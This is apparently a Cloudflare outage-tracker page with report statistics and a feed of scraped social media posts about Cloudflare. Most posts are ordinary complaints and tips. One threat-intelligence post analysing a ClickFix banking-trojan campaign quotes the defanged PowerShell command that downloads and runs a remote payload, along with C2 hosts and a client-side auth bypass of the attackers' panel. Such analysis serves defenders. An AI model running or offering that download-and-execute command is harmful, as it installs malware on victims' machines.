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Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.

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Most Reported Problems

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  • 33% Domains (33%)
  • 31% Cloud Services (31%)
  • 19% Hosting (19%)
  • 11% Web Tools (11%)
  • 6% E-mail (6%)

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The most recent Cloudflare outage reports came from the following cities:

CityProblem TypeReport Time
Angers Cloud Services 10 days ago
London Domains 12 days ago
Noida Hosting 25 days ago
Jewar E-mail 25 days ago
Braga Web Tools 25 days ago
Noida Cloud Services 26 days ago
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Cloudflare Issues Reports

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  • tush_2708
    Tushar Dwivedi (@tush_2708) reported

    @SayantikaSays Try @BSNLCorporate . And I am not joking. It is best if it's available in your area. No BS service. I never heard these lines from BSNL, which I kept hearing from other providers like Jio and Airtel. "We won't give you the router password" "You can't use your own router, even if ours is ******. What do you mean you have a better router and modem? Hou must pay us a subscription for this mesh thing instead" "No, you can't use Google or CloudFlare's DNS, you must use ours. What if it's slow? If you change, how will we snoop on you and inject our advertisements into your browser?" "No, you can't open a port for you. For that, you must buy a static IP from us. Why is a static IP needed to open a port? Who knows. But we won't allow it unless you pay us extra" In the last 3 years, I have only had 2 outages on BSNL, 30-40 minutes max. While on Airtel, I had caught their staff removing my cable from their box and adding a new one for a new connection, and then making me wait till they finally got a new box after a week. They just didn't want to make a new customer wait, so they simply assigned my slot to them. And their customer care and local staff wasn't even ready to accept it, unless I showed the CCTV footage and a video of my cable literally being thrown on the side of their box, not even connected, while they were claiming that there's some backend issue.

  • ZunairaAi
    Zunaira Ai (@ZunairaAi) reported

    6. Default DNS Resolution Lag What it does: When your TV tries to load the image thumbnails for an app like Netflix, it uses your Internet Service Provider's default DNS server to find out where those images live on the internet. Think of DNS as the internet's phone book. Why it kills performance: ISP phone books are notoriously slow and incredibly outdated. Often, your TV is not actually lagging at all. The processor is fine, but the TV is frozen waiting for your internet provider to tell it where to download the movie poster graphics. *********** it: Settings → Network → Network Status → IP Settings → DNS Setting → Enter Manually. Change the numbers to 8.8.8.8 (Google) or 1.1.1.1 (Cloudflare). You will literally watch your streaming apps load twice as fast.

  • DFIR_Radar
    DFIR Radar (@DFIR_Radar) reported

    AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

  • bgonzalesp
    Bernardo Gonzalez (@bgonzalesp) reported

    @CloudflareHelp @Cloudflare how do you expect we can contact support to gain access to my account, if you require to login to send a help request??? It's simple logic... I assume that your really don't care about helping your customers

  • SidDegen
    SID | Degen (@SidDegen) reported

    i don't buy the "ai search replaces Google" thesis. the data says the opposite is happening. Cloudflare Radar, may 2026: every ai chatbot — ChatGPT, Gemini, Claude, Perplexity — sends 0.29% of global search referrals. Google sends 87.63%. 301-to-1. Anthropic's ClaudeBot crawls 11,122 pages for every human visit it returns vs Google's 5:1. Alphabet Q1 2026 filing: Google search revenue $60.4B, +19% yoy, up from +17% in Q4. ai overviews hit 2.5B monthly users; ai mode crossed 1B. alphabet says ai overviews monetize at rates "similar to traditional search" (june 2026 investor presentation). the kill-google thesis is showing up as negative signal in the actual p&l. Perplexity — the consensus poster child — killed its entire ad business in feb (Financial Times, The Verge). ads generated $20K against $34M revenue. exec quote: "a user would just start doubting everything." a company that can't make advertising work cannot disrupt a $60B/quarter advertising business. the consensus pusher worth countering specifically — @sarahdingwang at a16z, who led Exa's $250M Series C at $2.2B in may. her line: "agents will search the web more than humans this year. soon orders of magnitudes more." historical analog — Netscape 1994-98. the next platform that would reduce windows to "a poorly debugged set of device drivers." 80% share, record ipo. microsoft bundled IE for free. netscape sold to AOL for scrap. the company that captured the value was the one everyone thought netscape would displace — Google, founded 1998 — the services layer above the commodity. counter-position: ai search isn't replacing Google. Google is becoming ai search. standalone players are fighting netscape's war while the incumbent absorbs the tech into a surface 2.5B people already use. investor read: Exa at $2.2B and Perplexity at $22B are priced for a market-share takeover the referral data says isn't happening. the smarter bet is the layer that monetizes the ai-overview expansion Google is driving.

  • ainews_24_7
    AI News 24 (@ainews_24_7) reported

    Cloudflare $NET rolled out the Cloudflare One stack to give AI agents autonomous control over Zero Trust environments. The new skill library handles planning and deployment without requiring manual migration support.

  • FemiSuccess7
    FILM DB | ۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗh (@FemiSuccess7) reported

    @OzorNdiOzor Yankee businesses know how to run a business properly I made a mistake with one of my websites on Cloudflare and made over 60 billion database writes in a month that become like $80 of bill to clear, I texted their support and explained to them and they cut it to $6 immediately!

  • KastanDay
    Kastan Day (@KastanDay) reported

    extremely bullish signal for open models, like on @Cloudflare Workers AI

  • simulx4
    simulx4 (@simulx4) reported

    cloudflare is using Kimi K2.6 to automatically resolve billing issues. and... it worked fine. it fixed my problem faster than any human. by chat/email... so much better than talking to a person, honestly

  • nhrdev
    nowshad (@nhrdev) reported

    can't imagine the day when it will go down like aws, CloudFlare, google 💀

  • specialkdelslay
    special k | CEO of stressed out era (@specialkdelslay) reported

    @DispairSoftware @DataDeLaurier No no, I am showing the IPs of the ones hitting our site. They belong to openai (afaik). Cloudflare has helped with some of the bot activity but not all of it. I think they make the assumption that openai, claud, et al are good actors who will honor txt directives, when I can see for sure they are not. What he was telling me is to tunnel connections thru cloudflare and host privately but those things wouldn't mitigate this particular issue

  • AutismCapital
    Autism Capital 🧩 (@AutismCapital) reported

    @jdoliner Sorry, can't do your scan today, Cloudflare is down.

  • zeropsio
    Zerops (@zeropsio) reported

    @shubh19 @isha_singh06 Hey! Zerops fits the Railway/Render slot when the backend needs managed Postgres/Valkey on a private network next to it, hardware-priced. Pair it with Cloudflare for static the same way.

  • SpecialSitsNews
    Special Situations 🌐 Research Newsletter (Jay) (@SpecialSitsNews) reported

    New Activist Name: Shares of $MTN are trading up 13% at $141.65 on Thursday, rebounding sharply from their 52-week low of $118.51 hit earlier this year, as the Semafor scoop circulates across trading desks. The intraday move lifts the company's market cap to roughly $5.05 billion. According to Semafor, Vail's bankers are tasked with assessing vulnerabilities across a broad front: labor unrest, weather-related demand swings, and the specific pressure campaign being waged by Prince, who co-founded Cloudflare (NET). Prince told a local Colorado publication in June 2026 that he is willing to invest $500 million in Park City Mountain Resort and admitted he has already fielded calls from activist investors probing Vail's weaknesses. His preferred blueprint would see Vail pivot to an asset-light model, acting as a partnership facilitator rather than a direct mountain owner, a structure that would almost certainly require carving up the company's core real-estate holdings. The timing is awkward for management. Vail reported fiscal Q3 2026 earnings per share of $8.81, missing the consensus estimate of $9.09 by 3.1%, while revenue of $1.21 billion came in roughly $10 million below forecasts. The company subsequently cut its fiscal 2026 net income guidance to a range of $128 million to $162 million and trimmed Resort Reported EBITDA guidance to $735$755 million, down from the prior range of $745$775 million. Net debt has climbed to $2.65 billion from $2.24 billion a year earlier, pushing net leverage to 3.5x trailing twelve-month EBITDA as of April 30, 2026, while cash on hand stood at $371.4 million. Into that environment, the board moved in May 2025 to recall Rob Katz, the executive who originally built Vail into a multi-mountain empire, ousting his hand-picked successor in the process. Katz has since focused on the operational grievances that drove customer dissatisfaction, particularly lift-line congestion and chronic labor shortages, introducing products like Epic Friend Tickets and discounted super-advanced lift tickets that are showing early traction. The move signals that Vail's board views operational credibility as its first line of defense against any activist pitch centered on mismanagement. Management also has a financial lever to highlight in any proxy fight. The company pays a quarterly cash dividend of $2.22 per share, with the next payment scheduled for July 9, 2026, equating to an annualized yield of roughly 6.6% at current prices. That yield argument, steady cash returns while the turnaround plays out, is a standard defensive talking point, though it carries less weight when leverage is rising and guidance is being cut. Investors will get a clearer read on whether Katz's operational fixes are gaining traction when Vail reports fiscal Q4 2026 results, tentatively scheduled for September 24, 2026. The setup is challenging: consensus EPS for that quarter stands at -$5.05, with eight analyst downward revisions in the past 90 days and no upward revisions, reflecting the structural headwinds Prince and any allied activist would likely exploit.

  • BwcDeals
    Aidan Quinn (@BwcDeals) reported

    @EcomCJ Man email me. This damn site dms I almost never get! I’m sorry. I’m close to passing Akamai. I can do it now with proxies but it’s expensive and I know I can do it without them. I’m doing it with Cloudflare and PerimeterX already.

  • DivineTrading
    Peter (@DivineTrading) reported

    @betangel Have successfully logged in at the 3rd attempt but was getting a Cloudflare issue (code 521)

  • fraey0
    ƒrαeყ (@fraey0) reported

    it costs about $21/month to run what could become a multi-million dollar startup • human brain = reasoning (free) • claude = coding ($20/mo) • supabase = backend (free) • vercel = deployment (free) • namecheap = domain ($12/yr) • stripe = payments (2.9%/trx) • github = versioning (free) • resend = email (free) • clerk = auth (free) • cloudflare = DNS (free) • posthog = analytics (free) • sentry = error tracking (free) • upstash = redis (free) • pinecone = vector DB (free) everything sums up to roughly $20 to $25 per month so, the tools are not the barrier anymore. most ideas don’t fail because they’re expensive to build. they fail because they never get built at all. what’s stopping you?

  • KarlEmilNikka
    Karl Emil Nikka (@KarlEmilNikka) reported

    @Cloudflare Nice! Do you have any ETA for sub-domain support?

  • ann1knit
    Ann the cat herder (@ann1knit) reported

    If cloudflare is so buggy and easily broken or hacked, why the frell hasn't someone come up with a better system or solution?

  • Habiboooo4
    HAB1B0 German Raffleking 🇩🇪🇹🇷👑{🦅} (@Habiboooo4) reported

    @Signulous Your cloudflare is down

  • mishuba
    丁飞龙 (@mishuba) reported

    Damn its almost like cloudflare doesnt exist and robot.txt must be nonexistent for this to happen. Vibe coders discovered ai thinking thats all they need to build a website like networking doesnt existing. Fix ya servers, networking and use cloudflare.

  • MalteLandwehr
    Malte Landwehr (@MalteLandwehr) reported

    @EddCoates So many solutions: · Cloudflare/CDN · Caching · Free API without authentication I once worked for a website with 90% bot traffic. This issue is manageable.

  • atresnjo1
    Adnan (@atresnjo1) reported

    if @Cloudflare services had a strict spending limit i'd use them for everything tbh, just too afraid to vibecode some side **** and wake up to a $5k bill

  • rohit_jsfreaky
    Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported

    @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem

  • dump_tcp
    tcpdump (@dump_tcp) reported

    @EddCoates if need any help with cloudflare I can help with some rules also it seems you're webserver code is bottlenecking you causing that error usually due to not being able to handle that many connections or to much cpu usage the webserver process dies i suggest using #golang best lang

  • zebassembly
    zeb (@zebassembly) reported

    @astuyve @boristane Yeah we aren't happy that the limitation has existed for so long either. We're working hard to try to not paint ourselves into a corner when the o11y platform we've built for Workers expands to being used for other products. There are many shortcuts we could have taken to got this shipped sooner but they may have put us in a state where we later couldn't reconcile it with tracing for another product. We're really going all-out for the o11y platform we're building within Cloudflare and that'll inevitably slow things down by preventing us from taking the easy paths.

  • DonPepeVaquito
    Mundo Trading (@DonPepeVaquito) reported

    Is cloudflare down or it's just me?

  • chirag
    Chirag (@chirag) reported

    There's a case to run a meta network on Cloudflare rails. These childish things by the regime can be bypassed at scale.

  • elshad_ff
    Elshad (@elshad_ff) reported

    @Teknium Anyone using dashboard via Cloudflare tunnel? Have you websocket problem?

  • cubeqube
    Qubicle | Based Dept. Treasury 🏦 (@cubeqube) reported

    @nejatian @Opendoor love the job posting super enticing, opendoor is legit the only company I've even thought about trying to actually get a job at in years wanted my current job to be my last but running it back one more time at a place im all in on and on an idea i want to see succeed before going off and doing my own thing sounds like fun. if my parents lived closer to Miami I'd be outside the office rn begging ya'll to hire me so I can help 100x OPEN but my parents are getting old now, etc. so I'm torn. I wish that job posting wasn't written for everything I like to do and how I work already it's just too good. I get bored with things that are easy to solve or do it's my biggest problem so I enjoy bouncing around to diff teams and doing random things and try to learn enough about everything so that I can do everyones job if needed & I've had some pretty intense cybersecurity fellas and cloud experts (from google, mandiant, etc) say I know what I'm doing when it comes to cloud after reviewing my **** infra setups and SDLC flows I designed and implemented so that's a big part of my T I guess, but it's boring me now because it's kind of easy at this point haven't had a tough challenge to solve in a bit; not that im the best ever or in an arrogant way but it's just all kind of the same thing at the end of the day and 99% of infra & software problems have been solved already they just need to be found first so it's more fun now for me to think about the entire pie than a piece of it thats why I like that job posting. fun fact: I used a cloudflare product in a unique way for my work's enterprise **** setup ~7 years ago that the cf team (atleast those in the call!) had never seen someone use it that way before, found it interesting and added it to their documentation a couple weeks later (a use case for argo tunnel) and it's now one of the most common uses of it. nothing fancy I thought it was cool though.